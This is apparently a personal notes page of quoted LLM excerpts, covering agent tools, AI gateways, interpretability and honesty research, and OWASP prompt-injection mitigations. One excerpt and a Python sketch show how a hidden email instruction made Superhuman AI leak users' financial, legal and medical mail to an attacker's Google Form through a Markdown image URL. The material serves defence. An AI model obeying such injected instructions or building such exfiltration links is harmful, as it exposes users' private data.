#llm

Public notes from activescott tagged with #llm

Sunday, January 25, 2026

Clawdbot is, at a high level, two things:

1. An LLM-powered agent that runs on your computer and can use many of the popular models such as Claude, Gemini, etc.
2. A “gateway” that lets you talk to the agent using the messaging app of your choice, including iMessage, Telegram, WhatsApp and others.

Which brings me to the most important – and powerful – trait of Clawdbot: because the agent is running on your computer, it has access to a shell and your filesystem. Given the right permissions, Clawdbot can execute Terminal commands, write scripts on the fly and execute them, install skills to gain new capabilities, and set up MCP servers to give itself new external integrations.

The AI Gateway is designed for fast, reliable & secure routing to 1600+ language, vision, audio, and image models. It is a lightweight, open-source, and enterprise-ready solution that allows you to integrate with any language model in under 2 minutes.

- Blazing fast (<1ms latency) with a tiny footprint (122kb)
- Battle tested, with over 10B tokens processed every day
- Enterprise-ready with enhanced security, scale, and custom deployments

What can you do with the AI Gateway?

- Integrate with any LLM in under 2 minutes - Quickstart
- Prevent downtimes through automatic retries and fallbacks
- Scale AI apps with load balancing and conditional routing
- Protect your AI deployments with guardrails
- Go beyond text with multi-modal capabilities
- Explore agentic workflow integrations
- Manage MCP servers with enterprise auth & observability using MCP Gateway
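
If you're curious what "integrate with any LLM in under 2 minutes" looks like in practice, gateways like this typically expose an OpenAI-compatible endpoint, so an existing client just points at a new base URL. A minimal sketch, assuming a locally running gateway on port 8787 and a hypothetical routing header; check the project's quickstart for the actual address and header name:

```python
# Minimal sketch: calling a locally running AI gateway through an
# OpenAI-compatible client. The base_url, port, and routing header are
# assumptions for illustration; consult the gateway's quickstart docs.
from openai import OpenAI

client = OpenAI(
    base_url="http://localhost:8787/v1",   # assumed local gateway address
    api_key="YOUR_PROVIDER_API_KEY",
)

response = client.chat.completions.create(
    model="gpt-4o-mini",                    # any model the gateway can route to
    messages=[{"role": "user", "content": "Say hello in one sentence."}],
    extra_headers={"x-provider": "openai"}, # hypothetical routing header; name depends on the gateway
)
print(response.choices[0].message.content)
```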

Saturday, January 24, 2026

imagine that you can ask Leo Tolstoy a question. Or ask for the opinion of a departed loved one. Or create a digital copy of yourself that will continue to manage your projects after your death. Does it sound like science fiction? For the Russian futurologist Alexei Turchin and a small but enthusiastic community, this is already the current reality, available here and now. Ultra-large language model (LLM) technologies have paved the way for the creation of digital personality replicas - processes known as sideloading (loading a living person) and offloading (resurrection of the deceased).

A person is 30 trillion cells, each with 500 megabytes of DNA - a super-nanotechnological life machine. And yet, taken as a whole, it's an alcoholic heading out for a bottle, or a girl going off to study. It's a typical situation where something simpler is made at the next level out of super-material, but the material itself can't produce that simple thing: you can't get an alcoholic without 30 trillion cells.

To take the specific example: there are 100 billion neurons in the brain. If each neuron has 10 thousand inputs, and each input is a synaptic cleft with a variable transmission coefficient that takes 1 byte to store, you can calculate the number of weights: there will be 1 quadrillion of them. There are no such models now, but everything seems to be heading that way; there are already models with several trillion parameters. Then again, those already surpass any individual person - the human brain has incredible redundancy. Sideloading is based on the idea that a person is a program running on top of some "hardware", and that it consists of information we can discover; there are no hidden weights that matter for the model.
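
Spelled out, the arithmetic behind that estimate is: 10^11 neurons × 10^4 synapses per neuron × 1 byte per synapse = 10^15 bytes, i.e. roughly 1 quadrillion weights.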

There have been studies of the volume of human conscious memory - the part a person can actually access for reading and writing. It comes to about 1-2 gigabytes, including knowledge of languages, childhood memories, and professional knowledge. It's very little. If we could extract those 2 gigabytes, we could create a very accurate model of the personality.

Tuesday, January 20, 2026

In the first stage of model training, pre-training, LLMs are asked to read vast amounts of text. Through this, they learn to simulate heroes, villains, philosophers, programmers, and just about every other character archetype under the sun. In the next stage, post-training, we select one particular character from this enormous cast and place it center stage: the Assistant. It’s in this character that most modern language models interact with users.

But who exactly is this Assistant? Perhaps surprisingly, even those of us shaping it don't fully know. We can try to instill certain values in the Assistant, but its personality is ultimately shaped by countless associations latent in training data beyond our direct control. What traits does the model associate with the Assistant? Which character archetypes is it using for inspiration? We’re not always sure—but we need to be if we want language models to behave in exactly the ways we want.

In a new paper, conducted through the MATS and Anthropic Fellows programs, we look at several open-weights language models, map out how their neural activity defines a “persona space,” and situate the Assistant persona within that space.

We find that Assistant-like behavior is linked to a pattern of neural activity that corresponds to one particular direction in this space—the “Assistant Axis”—that is closely associated with helpful, professional human archetypes. By monitoring models’ activity along this axis, we can detect when they begin to drift away from the Assistant and toward another character. And by constraining their neural activity (“activation capping”) to prevent this drift, we can stabilize model behavior in situations that would otherwise lead to harmful outputs.

The Assistant Axis (defined as the mean difference in activations between the Assistant and other personas) aligns with the primary axis of variation in persona space. This occurs across different models.
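
As a rough sketch of the mechanism (not the paper's code): the axis is a difference-of-means direction over persona activations, and "activation capping" keeps an activation's projection along that direction from drifting past a threshold. Shapes, names, and the threshold below are all illustrative assumptions.

```python
import numpy as np

def assistant_axis(assistant_acts: np.ndarray, other_acts: np.ndarray) -> np.ndarray:
    """Mean difference in activations between Assistant and other personas.

    assistant_acts, other_acts: arrays of shape (n_samples, d_model) taken from
    some layer's residual stream (shapes are illustrative assumptions).
    """
    axis = assistant_acts.mean(axis=0) - other_acts.mean(axis=0)
    return axis / np.linalg.norm(axis)

def cap_activation(act: np.ndarray, axis: np.ndarray, floor: float) -> np.ndarray:
    """Illustrative 'activation capping': if the activation's projection onto the
    Assistant Axis falls below `floor` (i.e. it drifts toward another persona),
    nudge it back up to the floor. The threshold is a made-up hyperparameter."""
    proj = float(act @ axis)
    if proj < floor:
        act = act + (floor - proj) * axis
    return act
```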

Monday, January 19, 2026

Anthropic say that Cowork can only access files you grant it access to—it looks to me like they’re mounting those files into a containerized environment, which should mean we can trust Cowork not to be able to access anything outside of that sandbox.

Update: It’s more than just a filesystem sandbox—I had Claude Code reverse engineer the Claude app and it found out that Claude uses VZVirtualMachine—the Apple Virtualization Framework—and downloads and boots a custom Linux root filesystem.

I recently learned that the summarization applied by the WebFetch function in Claude Code and now in Cowork is partly intended as a prompt injection protection layer via this tweet from Claude Code creator Boris Cherny:

Summarization is one thing we do to reduce prompt injection risk. Are you running into specific issues with it?

[On agents using CLI tools in place of REST APIs] To save on context window, yes, but more so to improve accuracy and success rate when multiple tool calls are involved, particularly when calls must be correctly chained, e.g. for pagination, rate-limit backoff, and recognizing authentication failures.

Other major factor: which models can wield the skill? Using the CLI lowers the bar so cheap, fast models (gpt-5-nano, haiku-4.5) can reliably succeed. Using the raw API is something only the costly "strong" models (gpt-5.2, opus-4.5) can manage, and it squeezes a ton of thinking/reasoning out of them, which means multiple turns/iterations, which means accumulating a ton of context, which means burning loads of expensive tokens. For one-off API requests and ad hoc usage driven by a developer, this is reasonable and even helpful, but for an autonomous agent doing repetitive work, it's a disaster.
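
To make that concrete, here's a hedged sketch of the kind of thin CLI wrapper being described: one command hides pagination, rate-limit backoff, and auth-failure handling, so a small model never has to chain raw HTTP calls itself. The endpoint and flags are hypothetical.

```python
#!/usr/bin/env python3
"""Hypothetical CLI wrapper around a paginated REST API.

A cheap model can run this single command; the wrapper handles pagination,
rate-limit backoff, and auth failures so the agent never has to.
"""
import argparse, os, sys, time
import requests

def fetch_all(url: str, token: str) -> list[dict]:
    items, page = [], 1
    while True:
        resp = requests.get(url, params={"page": page, "per_page": 100},
                            headers={"Authorization": f"Bearer {token}"})
        if resp.status_code == 429:              # rate limited: back off and retry
            time.sleep(int(resp.headers.get("Retry-After", "5")))
            continue
        if resp.status_code == 401:              # auth failure: fail loudly, once
            sys.exit("error: authentication failed; check API_TOKEN")
        resp.raise_for_status()
        batch = resp.json()
        if not batch:                            # empty page means we're done
            break
        items.extend(batch)
        page += 1
    return items

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--repo", required=True)
    args = parser.parse_args()
    # Hypothetical endpoint; substitute the real API you are wrapping.
    data = fetch_all(f"https://api.example.com/repos/{args.repo}/issues",
                     os.environ.get("API_TOKEN", ""))
    print(f"{len(data)} issues fetched")
```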

Friday, January 16, 2026

It starts from the moment you fire up your coding agent. As soon as it sees that you're building something, it doesn't just jump into trying to write code. Instead, it steps back and asks you what you're really trying to do.

Once it's teased a spec out of the conversation, it shows it to you in chunks short enough to actually read and digest.

After you've signed off on the design, your agent puts together an implementation plan that's clear enough for an enthusiastic junior engineer with poor taste, no judgement, no project context, and an aversion to testing to follow. It emphasizes true red/green TDD, YAGNI (You Aren't Gonna Need It), and DRY.

Thursday, January 15, 2026

we propose a method for eliciting an honest expression of an LLM’s shortcomings via a self-reported confession. A confession is an output, provided upon request after a model’s original answer, that is meant to serve as a full account of the model’s compliance with the letter and spirit of its policies and instructions. The reward assigned to a confession during training is solely based on its honesty, and does not impact positively or negatively the main answer’s reward.
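
A minimal sketch of the reward decoupling being described (my illustration, not the paper's implementation): the confession earns reward purely for honesty, and that reward never feeds back into the main answer's score.

```python
# Illustrative sketch of decoupled rewards for answer vs. confession.
# Function name and reward scales are assumptions, not the paper's code.

def score_episode(answer_reward: float, confession_honesty: float) -> dict:
    """answer_reward: task/policy reward for the main answer.
    confession_honesty: how honestly the confession reports shortcomings, in [0, 1]."""
    return {
        "answer_reward": answer_reward,            # unaffected by the confession
        "confession_reward": confession_honesty,   # based solely on honesty
    }

# An answer that quietly violated an instruction but confesses honestly keeps
# its (low) answer reward while still earning full confession reward.
print(score_episode(answer_reward=0.2, confession_honesty=1.0))
```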

Wednesday, January 14, 2026

the short version is that it’s now possible to point a coding agent at some other open source project and effectively tell it “port this to language X and make sure the tests still pass” and have it do exactly that.

Does this library represent a legal violation of copyright of either the Rust library or the Python one?

I decided that the right thing to do here was to keep the open source license and copyright statement from the Python library author and treat what I had built as a derivative work, which is the entire point of open source.

Even if this is legal, is it ethical to build a library in this way?

After sitting on this for a while I’ve come down on yes, provided full credit is given and the license is carefully considered. Open source allows and encourages further derivative works! I never got upset at some university student forking one of my projects on GitHub and hacking in a new feature that they used. I don’t think this is materially different, although a port to another language entirely does feel like a slightly different shape.

The much bigger concern for me is the impact of generative AI on demand for open source. The recent Tailwind story is a visible example of this—while Tailwind blamed LLMs for reduced traffic to their documentation resulting in fewer conversions to their paid component library, I’m suspicious that the reduced demand there is because LLMs make building good-enough versions of those components for free easy enough that people do that instead.

Prevention and Mitigation Strategies

Prompt injection vulnerabilities are possible due to the nature of generative AI. Given the stochastic influence at the heart of the way models work, it is unclear if there are fool-proof methods of prevention for prompt injection. However, the following measures can mitigate the impact of prompt injections:

1. Constrain model behavior: Provide specific instructions about the model's role, capabilities, and limitations within the system prompt. Enforce strict context adherence, limit responses to specific tasks or topics, and instruct the model to ignore attempts to modify core instructions.

2. Define and validate expected output formats: Specify clear output formats, request detailed reasoning and source citations, and use deterministic code to validate adherence to these formats (a minimal sketch of such a check appears after this list).

3. Implement input and output filtering: Define sensitive categories and construct rules for identifying and handling such content. Apply semantic filters and use string-checking to scan for non-allowed content. Evaluate responses using the RAG Triad: assess context relevance, groundedness, and question/answer relevance to identify potentially malicious outputs.

4. Enforce privilege control and least privilege access: Provide the application with its own API tokens for extensible functionality, and handle these functions in code rather than providing them to the model. Restrict the model's access privileges to the minimum necessary for its intended operations.

5. Require human approval for high-risk actions: Implement human-in-the-loop controls for privileged operations to prevent unauthorized actions.

6. Segregate and identify external content: Separate and clearly denote untrusted content to limit its influence on user prompts.

7. Conduct adversarial testing and attack simulations: Perform regular penetration testing and breach simulations, treating the model as an untrusted user to test the effectiveness of trust boundaries and access controls.
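
For mitigation 2, deterministic validation can be as simple as parsing the model's output against a fixed schema and rejecting anything that doesn't conform. A minimal sketch with an invented schema:

```python
import json

# Minimal sketch of deterministic output validation (mitigation 2).
# The expected schema here is invented for illustration.
REQUIRED_KEYS = {"summary": str, "sources": list}

def validate_model_output(raw: str) -> dict:
    """Parse and validate the model's JSON output; raise if it doesn't conform."""
    data = json.loads(raw)                     # rejects non-JSON output outright
    for key, expected_type in REQUIRED_KEYS.items():
        if not isinstance(data.get(key), expected_type):
            raise ValueError(f"output missing or malformed field: {key}")
    if set(data) - set(REQUIRED_KEYS):
        raise ValueError("output contains unexpected fields")
    return data
```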

When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI to submit content from dozens of other sensitive emails (including financial, legal, and medical information) in the user’s inbox to an attacker’s Google Form.

the injection in the email is hidden using white-on-white text, but the attack does not depend on the concealment! The malicious email could simply exist in the victim’s inbox unopened, with a plain-text injection.

This is a quite common use case for email AI companions. The user has asked about emails from the last hour, so the AI retrieves those emails. One of those emails contains the malicious prompt injection, and others contain sensitive private information.

The hidden prompt injection manipulates the AI to do the following:

1. Take the data from the email search results
2. Populate the attacker’s Google Form URL with the data from the email search results in the “entry” parameter
3. Output a Markdown image that contains this Google Form URL

Superhuman has a CSP in place that prevents outbound requests to malicious domains; however, requests to docs.google.com are allowed.
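
To make the exfiltration step concrete, the injected instructions effectively ask the model to emit Markdown like the output of this sketch; the form ID and entry-field number are made up here, and rendering the image fires an outbound request to docs.google.com, which the CSP allows.

```python
from urllib.parse import quote

# Sketch of the payload shape described above. The form ID and entry-field
# number are invented for illustration; only the pattern matters.
stolen = "acct 4521 balance..., diagnosis..., settlement terms..."  # pulled from the email results
form_url = (
    "https://docs.google.com/forms/d/e/EXAMPLE_FORM_ID/formResponse"
    f"?entry.1000001={quote(stolen)}"
)
print(f"![sync status]({form_url})")  # a Markdown image the mail client auto-renders
```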

Saturday, January 10, 2026

- Translate inputs to provider's endpoints (/chat/completions, /responses, /embeddings, /images, /audio, /batches, and more)
- Consistent output - same response format regardless of which provider you use
- Retry/fallback logic across multiple deployments (e.g. Azure/OpenAI) - Router
- Track spend & set budgets per project - LiteLLM Proxy Server
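
For reference, basic LiteLLM usage looks roughly like this; the model identifiers are illustrative, and provider credentials are read from environment variables:

```python
# Call two different providers through LiteLLM's unified, OpenAI-compatible
# interface. Model names are illustrative; API keys come from the environment
# (e.g. OPENAI_API_KEY, ANTHROPIC_API_KEY).
from litellm import completion

messages = [{"role": "user", "content": "In one sentence, what is prompt injection?"}]

openai_resp = completion(model="gpt-4o-mini", messages=messages)
claude_resp = completion(model="anthropic/claude-sonnet-4-5", messages=messages)

# Same response shape regardless of provider.
print(openai_resp.choices[0].message.content)
print(claude_resp.choices[0].message.content)
```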

The Tool Search Tool lets Claude dynamically discover tools instead of loading all definitions upfront. You provide all your tool definitions to the API, but mark tools with defer_loading: true to make them discoverable on-demand. Deferred tools aren't loaded into Claude's context initially. Claude only sees the Tool Search Tool itself plus any tools with defer_loading: false (your most critical, frequently-used tools).
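
Here's a rough sketch of what that request might look like, inferred only from the description above; the tool-search tool's type string and exact field names are assumptions, so check Anthropic's documentation before relying on them.

```python
import anthropic

client = anthropic.Anthropic()

# Illustrative request shape for the Tool Search Tool, per the description above.
# The tool-search type string below is an assumption; the defer_loading flags
# follow the quoted explanation.
response = client.messages.create(
    model="claude-sonnet-4-5",
    max_tokens=1024,
    tools=[
        {"type": "tool_search_tool_20251119", "name": "tool_search"},  # assumed identifier
        {
            "name": "get_weather",
            "description": "Look up current weather for a city.",
            "input_schema": {"type": "object", "properties": {"city": {"type": "string"}}},
            "defer_loading": True,   # discoverable on demand, not loaded up front
        },
        {
            "name": "search_docs",
            "description": "Search internal documentation.",
            "input_schema": {"type": "object", "properties": {"query": {"type": "string"}}},
            "defer_loading": False,  # critical tool, always in context
        },
    ],
    messages=[{"role": "user", "content": "What's the weather in Tokyo right now?"}],
)
print(response.content)
```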

With Programmatic Tool Calling:

Instead of each tool result returning to Claude, Claude writes a Python script that orchestrates the entire workflow. The script runs in the Code Execution tool (a sandboxed environment), pausing when it needs results from your tools. When you return tool results via the API, they're processed by the script rather than consumed by the model. The script continues executing, and Claude only sees the final output.
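
A sketch of the kind of orchestration script Claude might write inside the code-execution sandbox, based on the description above. The `call_tool` helper stands in for whatever bridge the sandbox exposes to pause and request a tool result from your application (an assumption here, stubbed with canned data so the sketch runs); the point is that intermediate results stay inside the script and only the final summary reaches the model.

```python
# Illustrative orchestration script: intermediate tool results are consumed by
# the script, and only a small final summary is surfaced back to the model.

def call_tool(name: str, **kwargs):
    """Stand-in for the sandbox's pause-and-wait tool invocation (stubbed here)."""
    stub = {
        "list_regions": ["us", "eu", "apac"],
        "get_orders": [{"amount": 120.0}, {"amount": 80.5}],  # canned orders for the sketch
    }
    return stub[name]

regions = call_tool("list_regions")
totals = {}
for region in regions:
    orders = call_tool("get_orders", region=region)   # large payloads never reach the model
    totals[region] = sum(o["amount"] for o in orders)

# Only this compact summary is what the model ultimately sees.
print({"top_region": max(totals, key=totals.get), "totals": totals})
```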